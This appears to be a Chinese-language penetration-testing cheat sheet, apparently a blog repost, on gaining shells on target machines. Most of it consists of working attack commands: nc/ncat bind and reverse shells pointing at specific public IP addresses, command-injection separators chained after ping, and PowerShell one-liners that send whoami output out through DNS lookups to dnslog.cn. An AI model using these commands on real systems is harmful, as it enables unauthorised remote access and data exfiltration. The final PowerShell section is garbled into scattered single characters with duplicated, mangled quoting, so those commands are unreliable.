常规基本渗透命令详解
https://blog.youkuaiyun.com/weixin_43303273/article/details/83029138
文件下载
实用案例1:文件上传下载-解决无图形化&解决数据传输
命令生成:https://forum.ywhack.com/bountytips.php?download]
Linux:wget curl python ruby perl java等
Windows:PowerShell Certutil Bitsadmin msiexec mshta rundll32等
反弹shell
什么是反弹shell
反弹shell就是在进行渗透测试时,攻击机在监听某个端口时。目标机主动发起请求连接到攻击机,并将其命令行的输入输出转到攻击机。
命令生成:
https://forum.ywhack.com/shell.php
1、正向连接:本地监听等待对方连接
Linux控制Windows
//绑定CMD到本地5566端口
nc -e cmd -lvp 5566
//主动连接目标5566
ncat 47.122.23.131 5566
Windows控制Linux //绑定SH到本地5566端口
ncat -e /bin/sh -lvp 5566
//主动连接目标5566
nc 47.94.236.117 5566
2、反向连接:主动给出去,对方监听
//绑定CMD到目标5566端口
ncat -e /bin/sh 47.122.23.131 5566
//等待5566连接
nc -lvvp 5566
//绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566
//等待5566连接
ncat -lvvp 5566
//绑定CMD到目标5566端口
nc -e cmd 47.94.236.117 5566
//等待5566连接
ncat -lvvp 5566
#实际案例1:防火墙绕过-正向连接&反向连接&内网服务器
管道符:| (管道符号) ||(逻辑或) &&(逻辑与) &(后台任务符号)
Windows->| & || &&
Linux->; | || & && (特有``和;)
例子:
ping -c 1 127.0.0.1 ; whoami
ping -c 1 127.0.0.1 | whoami
ping -c 1 127.0.0.1 || whoami
ping -c 1 127.0.0.1 & whoami
ping -c 1 127.0.0.1 && whoami
ping -c 1 127.0.0.1 whoami
1、判断windows
2、windows没有自带的nc
3、想办法上传nc 反弹权限
4、反弹
开启入站策略,采用反向连接
Linux:ncat -lvvp 5566
Windows:127.0.0.1 | nc -e cmd 47.94.236.117 5566
开启出站策略,采用正向连接
Linux:ncat -e cmd 47.122.23.131 5566
Windows:127.0.0.1 | nc -e cmd -lvvp 5566
正反向反弹案例-内网服务器
只能内网主动交出数据,反向连接
#实际案例2:防火墙组合数据不回显-ICMP带外查询Dnslog
出站入站都开启策略(数据不回显):OSI网络七层
127.0.0.1 | powershell
x
=
w
h
o
a
m
i
;
x=whoami;
x=whoami;x=
x
.
R
e
p
l
a
c
e
(
′
,
ˊ
′
x
x
x
′
)
;
x.Replace('\','xxx');
x.Replace(′,ˊ′xxx′);y=‘.f4an93.dnslog.cn’;
z
=
z=
z=x+$y;ping $z
漏洞有,但是数据不回显:
1、反弹shell
2、带外查询
确定能执行命令
windows
;
ping 127.0.0.1 |
为什么要这样写
cmd无法执行whoami
用到powershell变量赋值 把whoami执行结果给变量
结果带有“\” 导致ping无法执行
powershell x = w h o a m i ; x=whoami; x=whoami;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(′,ˊ′xxx′);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z
127.0.0.1 | powershell x = v e r ; x=ver; x=ver;x= x . R e p l a c e ( ′ , ˊ ′ x x x ′ ) ; x.Replace('\','xxx'); x.Replace(′,ˊ′xxx′);y=‘.vpod5d.dnslog.cn’; z = z= z=x+$y;ping $z